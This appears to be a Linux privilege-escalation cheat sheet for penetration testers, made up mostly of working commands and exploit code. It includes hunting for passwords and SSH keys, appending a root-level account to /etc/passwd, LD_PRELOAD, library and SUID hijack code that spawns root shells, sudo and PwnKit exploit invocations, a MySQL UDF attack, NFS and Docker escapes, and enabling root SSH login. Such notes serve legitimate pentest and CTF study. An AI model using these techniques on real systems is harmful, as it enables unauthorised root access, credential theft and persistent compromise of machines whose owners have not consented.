Skip to content

Linux

Tools

  • LinPEAS: https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/linPEAS
  • LinEnum: https://github.com/rebootuser/LinEnum
  • Linux exploit suggester: https://github.com/mzet-/linux-exploit-suggester
  • LinuxPrivChecker: https://github.com/sleventyeleven/linuxprivchecker
  • PsPy : https://github.com/DominicBreuker/pspy
  • GTFObins : https://gtfobins.github.io/

User enumeration

whoami
id
sudo -l
cat /etc/passwd

System enumeration

hostname
uname -a
cat /proc/version
cat /etc/issue # Distribution
lscpu # Arch
ps aux | grep root
cat /etc/*-release
ldd --version # glibc version

Network enumeration

ip a
ifconfig
iwconfig
ip route
route
arp -a
ip neigh
netstat -ano
netstat -tunlp
sockstat # FreeBSD
sockstat -4l # FreeBSD, only IPv4

Account lockout

grep tally /etc/pam.d/*
grep tally /etc/pam.conf

Escape restricted shells

  • https://speakerdeck.com/knaps/escape-from-shellcatraz-breaking-out-of-restricted-unix-shells?slide=6

Password Hunting

Keywords to try : pass, secret, key... 

find . # From user, opt or web server directories
grep --color=auto -rnw '/' -ie "PASSWORD=" --color=always 2>/dev/null
find . -type f -exec grep -i -I "PASSWORD" {} /dev/null \;
find / -name *.txt 2>/dev/null
SSH 
find / -name authorized_keys 2>/dev/null
find / -name id_rsa 2>/dev/null
History files 
cat ~/.*history | less
Also take a look at config files.

Weak File Permissions

Shadow file : Crack hash if readable. Generate password if writable, then replace root password in the shadow file and su root. 

ls -l /etc/shadow
cat /etc/shadow 
mkpasswd -m sha-512

Passwd file : Generate password if writable, then replace the "x" in second field by the password generated and su root. 

ls -l /etc/passwd
openssl passwd newpasswordhere


echo newroot:YiV30ZoQz25SA:0:0:root:/root:/bin/bash >> /etc/passwd
# Connect using newroot:pentest

Lib directories : Craft a malicious libcustom library and replace it into /lib or /usr/lib. When executing /usr/bin/myexec, the malicious library will be called instead. 

ls -l /lib
ls -l /usr/lib

Kernel Exploits

  • https://github.com/lucyoa/kernel-exploits

# Google is your friend
./linux-exploit-suggester.sh
./linux-exploit-suggester.sh --checksec
./linux-exploit-suggester.sh --uname <uname-string>
MSF 
post/multi/recon/local_exploit_suggester

Dirty Cow :

  • https://github.com/dirtycow/dirtycow.github.io/wiki/PoCs.
  • https://github.com/dirtycow/dirtycow.github.io/wiki/Patched-Kernel-Versions
  • Binary should be compiled on the target. 
gcc -pthread c0w.c -o c0w
./c0w
passwd

Dirty Pipe CVE-2022-0847 - Linux Kernel 5.8 < 5.16.11 :

  • https://github.com/basharkey/CVE-2022-0847-dirty-pipe-checker
  • https://github.com/Arinerron/CVE-2022-0847-DirtyPipe-Exploit

Sudo

sudo -l # GTFObins AND Google are your friends

Sudo can be configured to inherit certain environment variables, check env_keep+=.

  • LD_PRELOAD specifies a library which will be loaded prior to any other library when the program gets executed.
#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>

void _init() {
    unsetenv("LD_PRELOAD");
    setgid(0);
    setuid(0);
    system("/bin/bash");
}

gcc -fPIC -shared -nostartfiles -o /tmp/preload.so /tmp/preload.c
sudo LD_PRELOAD=/tmp/preload.so <sudo-binary>
  • LD_LIBRARY_PATH indicates an additionnal directory to search for libraries.
#include <stdio.h>
#include <stdlib.h>

static void hijack() __attribute__((constructor));

void hijack() {
        unsetenv("LD_LIBRARY_PATH");
        setresuid(0,0,0);
        system("/bin/bash -p");
}

ldd /usr/sbin/binary # check shared libraries used by the program
gcc -o /tmp/lib_name.so.1 -shared -fPIC /tmp/library_path.c # create a shared object with the same name as one of the listed libraries (lib_name.so.1)
sudo LD_LIBRARY_PATH=/tmp binary # set the LD_LIBRARY_PATH environment variable to /tmp (where the compiled shared object was put)
  • Sudo < 1.8.2-1.8.31p2 & 1.9.0-1.9.5p1 Baron Samedit, CVE-2021-3156 : https://github.com/worawit/CVE-2021-3156 or https://github.com/blasty/CVE-2021-3156
# PoC
sudoedit -s '\' `perl -e 'print "A" x 65536'`
sudoedit -s '\' $(python3 -c 'print("A"*1000)')
  • Sudo < 1.8.27 Security Bypass (!root), CVE-2019-14287 : https://www.exploit-db.com/exploits/47502
sudo -u#-1 <command>
sudo -u#-1 /bin/bash
  • Sudo < 1.8.26 Buffer Overflow (pwfeedback) / CVE-2019-18634 : https://github.com/saleemrashid/sudo-cve-2019-18634

pwfeedback is the option that print the char '*' when you type your password when using sudo.

cat /etc/sudoers # The buffer overflow is possible if pwfeedback is set in /etc/sudoers
gcc exploit.c -o exploit

SUID / SGID

find / -type f -a \( -perm -u+s -o -perm -g+s \) -exec ls -l {} \; 2> /dev/null
  • Look on GTFOBins : https://gtfobins.github.io/

  • Look for known exploits

  • Shared object injection

# search for .so file loaded in a writable directory
strace <SUID-BINARY> 2>&1 | grep -i -E "open|access|no such file"   

#include <stdio.h>
#include <stdlib.h>

static void inject() __attribute__((constructor));

void inject(){
    system("cp /bin/bash /tmp/bash && chmod +s /tmp/bash && /tmp/bash -p");
}

gcc -shared -fPIC -o /home/user/.config/lib.so /home/user/.config/lib.c

  • If a binary is called without its path, it can be exploited due to it inheriting the user's PATH environment variable and attempting to execute programs without specifying an absolute path :
strings /usr/bin/suid-program # identify binary without full path inside

type binary # not built-in

export PATH=/tmp:$PATH
echo "/bin/sh -p" > /tmp/binary
chmod +x /tmp/binary

/usr/bin/suid-program
  • Abusing shell features, bash < 4.2.048 :

In Bash versions < 4.2-048 it is possible to define shell functions with names that resemble file paths, then export those functions so that they are used instead of any actual executable at that file path.

/bin/bash --version

strings /usr/local/bin/suid-program # identify the absolute path of the executable (/usr/sbin/service)

function /usr/sbin/service { /bin/bash -p; }
export -f /usr/sbin/service

/usr/local/bin/suid-program
  • Abusing shell features, bash < 4.4 :

When in debugging mode, Bash uses the environment variable PS4 to display an extra prompt for debugging statements

env -i SHELLOPTS=xtrace PS4='$(cp /bin/bash /tmp/rootbash; chmod +xs /tmp/rootbash)' /usr/local/bin/suid-env2
/tmp/rootbash -p
  • PwnKit CVE-2021-4034 : https://github.com/ly4k/PwnKit
./PwnKit id
./Pwnkit # interactive shell

Crontab

PsPy is your friend.

cat /etc/crontab

Check for:

  • File permissions
find / -name program.sh
ls -l /path/to/program.sh

  • PATH : Create program in writable path executed first and make it executable !

  • Wildcards (*)

  • Search exploits on commands running as root

Capabilities

getcap -r / 2>/dev/null
# /usr/bin/python2.6 = cap_setuid+ep

/usr/bin/python2.6 -c 'import os; os.setuid(0); os.system("/bin/bash")'

Interresting capabilities are : - ep = the binary has all the capabilities - cap_dac_read_search = read anything - cap_setuid+ep = setuid

Localhost services

Redirect local port 8888 on remote port 5901 accessible only from localhost through ssh 

netstat -tunlp # Notice localhost service
ssh -L 8888:127.0.0.1:5901 user@10.10.10.10

MySQL service

  • If MySQL service is running as root and the "root" user for the service does not have a password assigned we can abuse User Defined Function (UDF)
ps aux | grep root
mysql -u root [-p pass]
  • enumerate FILE permission, version and plugin_dir
# look privileges 
SHOW Grants;

# look at variables including hostname, plugin_dir, tmpdir, version, version_compile_machine 
show variables;
show variables where (Variable_name="hostname" or Variable_name="plugin_dir" or Variable_name="version" or Variable_name="tmpdir" or Variable_name="version_compile_machine");

Exploit : https://www.exploit-db.com/exploits/1518

  • Compile
gcc -g -c raptor_udf2.c -fPIC
gcc -g -shared -Wl,-soname,raptor_udf2.so -o raptor_udf2.so raptor_udf2.o -lc
  • Connect to mysql and create a User Defined Function (UDF) "do_system" :
    • In MySQL versions prior to 4.1.25 / 5.0.67, the .so file must be in a directory that is searched by your system’s dynamic linker.
    • Otherwise the .so file must be located in the plugin directory. If no plugin_dir, the previous behavior apply.
use mysql;
create table foo(line blob);
insert into foo values(load_file('/tmp/raptor_udf2.so'));
select * from foo into dumpfile '/lib/raptor_udf2.so';
create function do_system returns integer soname 'raptor_udf2.so';

select do_system('cp /bin/bash /tmp/rootbash; chmod +xs /tmp/rootbash');

exit

/tmp/rootbash -p

NFS root squashing

  • Files created via NFS inherit the remote user's ID. If the user is root, and root squashing is enabled, the ID will instead be set to the "nobody" user.
  • https://book.hacktricks.xyz/linux-hardening/privilege-escalation/nfs-no_root_squash-misconfiguration-pe
# On victim machine, notice /shared share has root squasing disabled 
cat /etc/exports

# On attacking machine
# remote check the name of the folder
showmount -e $IP

# create dir
mkdir /tmp/nfsdir  

# mount directory 
mount -t nfs $IP:/shared /tmp/nfsdir [OR] mount -o rw,vers=2 $IP:/shared /tmp/nfsdir
cd /tmp/nfsdir

# copy wanted shell 
cp /bin/bash .  

# set suid permission on it
chmod +s bash 

# On victim machine, run bash
/shared/bash -p

Docker

id  # docker group
find / -name docker.sock 2>/dev/null    # /run/docker.sock
docker images   # repository bash
docker run -it -v /:/host/ bash chroot /host/ bash

Other

screen -r session_name/
tmux attach-s -t session_name

EUID to UID root

python -c 'import pty; import os; os.setuid(0); pty.spawn("/bin/bash")'

Allow root password ssh

echo PermitRootLogin yes >> /etc/ssh/sshd_config
sudo service ssh restart